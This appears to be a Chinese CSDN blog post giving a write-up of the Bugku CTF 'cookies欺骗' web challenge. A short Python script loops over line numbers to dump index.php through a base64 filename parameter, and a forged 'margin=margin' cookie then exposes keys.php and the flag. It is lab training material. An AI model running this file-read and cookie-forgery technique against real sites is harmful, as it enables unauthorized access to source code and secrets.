bugku cookies欺骗

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量225 收藏
点赞数
文章标签: cookie 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51439282/article/details/113620062
版权

打开题目可以看到一堆乱码毫无规律
在这里插入图片描述
之后发现网址中有一串base64编码a2V5cy50eHQ=
解码得到:keys.txt
在这里插入图片描述

再尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码)
在这里插入图片描述

line应该是行数那么就从0开始试发现每增加一个数字都有所不同

这样一个一个试太麻烦,直接用脚本将源码跑出来

import requests
a = 30
for i in range(a):
    url = "http://114.67.246.176:16736/index.php?line=" + str(i) + "&filename=aW5kZXgucGhw"
    s = requests.get(url)
    print(s.text)

在这里插入图片描述
得到以下代码

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

 
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}


if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

发现只用构造cookie:margin=margin就可以了

在这里插入图片描述

值得注意的是
在这里插入图片描述

这里需要改成keys.php的base64编码

这样flag就到手了

又是收获知识的一天

Csrcsyh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
【标题】: "防范Cookies欺骗漏洞的策略与实践(vbs+js实现)" 【描述】: 本文探讨了如何防范ASP开发中的Cookies欺骗漏洞,通过VBS(Visual Basic Script)和JS(JavaScript)代码示例,阐述了从依赖不安全的Cookies...
Bugku cookies欺骗
kaixinXQ的博客
08-08 164
Bugku cookies欺骗 1.点开链接显示字符串 2.filename=a2V5cy50eHQ= base64解码为keys.txt,将index.php通过base64编码,查看源码 url为:http://114.67.246.176:19276/index.php?line=1&filename=aW5kZXgucGhw 通过python脚本读取全部内容: import requests for i in range(30): url = "http://11...
BugKucookies 欺骗
qq_39368007的博客
06-09 1439
查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30 import...
bugku cookies欺骗-wp
freerats的博客
07-14 203
打开容器,发现一大串字符串,发现他们是循环的,研究了一会什么都没发现(事实的确是字符串本身没有什么意义) 上面有俩参数,解码一下是keys.txt,前面的line改0页面不变,改1发现页面改变。 把key.txt改成index.php,发现该前面的参数为1出现代码,改2有不同的代码,结合参数名猜测是通过参数控制显示不同的行,后面还有很多,写个脚本跑一下 import requests url='http://123.206.87.240:8002/web11/index.php?line=2&amp
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
[CTF]Bugku cookies欺骗
第八个男人
08-10 322
https://ctf.bugku.com/challenges/detail/id/87.html 打开网页是一串乱码,源代码也是乱码,查看Response也没有特别信息,题目提到的cookie里面也是空内容。 从题目的链接入手,http://114.67.246.176:14576/index.php?line=&filename=a2V5cy50eHQ= filename后面带的这串经过base64解密后是keys.txt,所以这一段就是可以修改的,我们把这串改成题目中的网页index.
BUGKU-WEB cookies
天泽岁月
03-12 1193
BUGKU-WEB cookie欺骗
Bugku——cookies欺骗
Dig_的博客
09-22 1110
URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。 key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。 index.php用base64加密后替换key.txt的base64,页面存在却没有内容,查看源码发现只有&amp;amp;lt;?php ,说明源码需要加参数遍历。 发现给参数line一个个传入值才有源码,写脚本遍历出源码 import...
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 301
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
bugkucookies欺骗
Seaern的博客
08-02 623
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
cookie 修改欺骗必备工具
12-29
在网络安全领域,Cookie修改欺骗是一种常见的技术,常用于测试网站的安全性、理解用户跟踪机制以及进行恶意攻击。本文将深入探讨Cookie的相关知识,包括其原理、作用,以及如何使用修改工具进行欺骗操作。 Cookie是...
JavaScript的Cookies
10-30
# JavaScript的Cookies详解 ## 一、什么是CookiesCookies是一种小型的数据文件,通常由网站服务器创建并存储在用户的计算机硬盘上。这些数据文件用于记录用户的特定信息,以便于网站能够识别用户并根据用户的...
基于JAVA的厨艺交流平台(Vue.js+SpringBoot+MySQL)
08-01
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 演示录屏:https://www.bilibili.com/video/BV1uz42197zu 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
层次分析法数学建模论文.doc
最新发布
08-01
层次分析法数学建模论文
操作系统原理试卷及参考答案(A).doc
08-01
操作系统原理试卷及参考答案(A)
客户销售额排名.xlsx.xlsx
08-01
销售管理,客户类型,客户满意度,客户登记,进销存,客户记录 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于java及C++实现的Arduino智能小车,六种控制方式(超声波避障/跟随,红外循迹/遥控,蓝牙遥控,PS2遥控)+源码
08-01
基于java及C++实现的Arduino智能小车,六种控制方式(超声波避障/跟随,红外循迹/遥控,蓝牙遥控,PS2遥控)+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档~ 基于java及C++实现的Arduino智能小车,六种控制方式(超声波避障/跟随,红外循迹/遥控,蓝牙遥控,PS2遥控)+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档~ 项目简介: arduino程序使用模块化设计,可扩展各类玩法。 目前支持六种控制方式,主要分为程控方式和遥控方式, 程控方式 超声波避障 超声波跟随 红外循线 遥控方式 红外遥控 蓝牙遥控 PS2遥控
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值